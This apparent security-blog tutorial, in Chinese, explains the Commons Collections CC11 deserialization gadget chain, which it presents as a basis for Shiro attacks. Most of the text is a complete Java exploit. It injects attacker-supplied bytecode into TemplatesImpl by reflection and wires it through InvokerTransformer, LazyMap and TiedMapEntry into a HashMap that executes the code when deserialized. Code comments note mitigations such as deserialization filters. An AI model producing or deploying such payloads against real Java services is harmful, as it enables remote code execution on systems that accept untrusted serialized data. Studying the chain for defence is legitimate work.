Java反序列化之CC11

环境配置

Commons Collections: 3.2.1

jdk8u71

核心思想

这条链子是为后面的 Shiro 反序列化服务的：它不需要通过 Transformer 数组就可以实现反序列化利用。

TemplatesImpl -> InvokerTransformer -> LazyMap -> TiedMapEntry -> HashMap

EXP

    /**
     * Builds the CC11 object graph described above and round-trips it through the
     * file-level {@code serialize}/{@code unserialize} helpers (both defined outside
     * this listing). What gets written out is an ordinary {@link HashMap} whose single
     * key is a {@link TiedMapEntry}; every class in the graph is JDK or Commons
     * Collections code, so the relevant mitigation on a receiving side is a
     * deserialization filter ({@code ObjectInputFilter}, JEP 290) or a Commons
     * Collections release that refuses to deserialize {@code InvokerTransformer}
     * (3.2.2 and later), not anything in this program.
     *
     * @param argc unused
     * @throws Exception reflection, I/O and deserialization failures are propagated as-is
     */
    public static void main(String[] argc) throws Exception {
        Field field;

        // The bytecode carrier: TemplatesImpl is populated purely via reflection
        // because the fields below are private and have no public setters.
        TemplatesImpl templates = new TemplatesImpl();
        // calc.class is read from the working directory; its contents are not part of this page.
        byte[] evil = Files.readAllBytes(Paths.get("calc.class"));

        // _name: value is arbitrary here — presumably just needs to be non-null
        // for newTransformer() to proceed (TemplatesImpl source not shown on this page).
        field = TemplatesImpl.class.getDeclaredField("_name");
        field.setAccessible(true);
        field.set(templates, "P3ngu1nW");

        // _bytecodes: the class that newTransformer() will define and instantiate.
        field = TemplatesImpl.class.getDeclaredField("_bytecodes");
        field.setAccessible(true);
        field.set(templates, new byte[][]{evil});

        // _tfactory: presumably required so newTransformer() does not fail on a
        // null factory before the bytecode is loaded — TODO confirm against TemplatesImpl.
        field = TemplatesImpl.class.getDeclaredField("_tfactory");
        field.setAccessible(true);
        field.set(templates, new TransformerFactoryImpl());

        // InvokerTransformer reflectively calls a zero-argument "newTransformer" on
        // whatever object it is handed; no ChainedTransformer / Transformer[] is used,
        // which is the point of this variant (see the notes above the listing).
        Transformer transformer = new InvokerTransformer("newTransformer", new Class[]{}, new Object[]{});
        // LazyMap applies its transformer to a key that is absent on get().
        Map lazyMap = LazyMap.decorate(new HashMap<Object, Object>(), transformer);
        Map tmp = new HashMap<>();

        // The entry is first tied to the harmless, empty map `tmp`; its key is the
        // TemplatesImpl instance, which is what LazyMap will later hand to the transformer.
        TiedMapEntry tiedMapEntry = new TiedMapEntry(tmp, templates);

        HashMap<Object, Object>hashMap = new HashMap<Object, Object>();
        // put() evaluates the entry's hashCode() now — presumably the reason the
        // backing map is still `tmp` at this point, so nothing is triggered locally.
        hashMap.put(tiedMapEntry, 1);

        // Only after insertion is the entry's private `map` field swapped to lazyMap.
        // The chain therefore fires only in the process that deserializes the HashMap;
        // this is why a network-facing ObjectInputStream with no filter is the real exposure.
        field = TiedMapEntry.class.getDeclaredField("map");
        field.setAccessible(true);
        field.set(tiedMapEntry, lazyMap);

        // serialize presumably writes "ser.bin" (helper not shown); unserialize then
        // replays the receiving side's behaviour in this same JVM for demonstration.
        serialize(hashMap);
        unserialize("ser.bin");
    }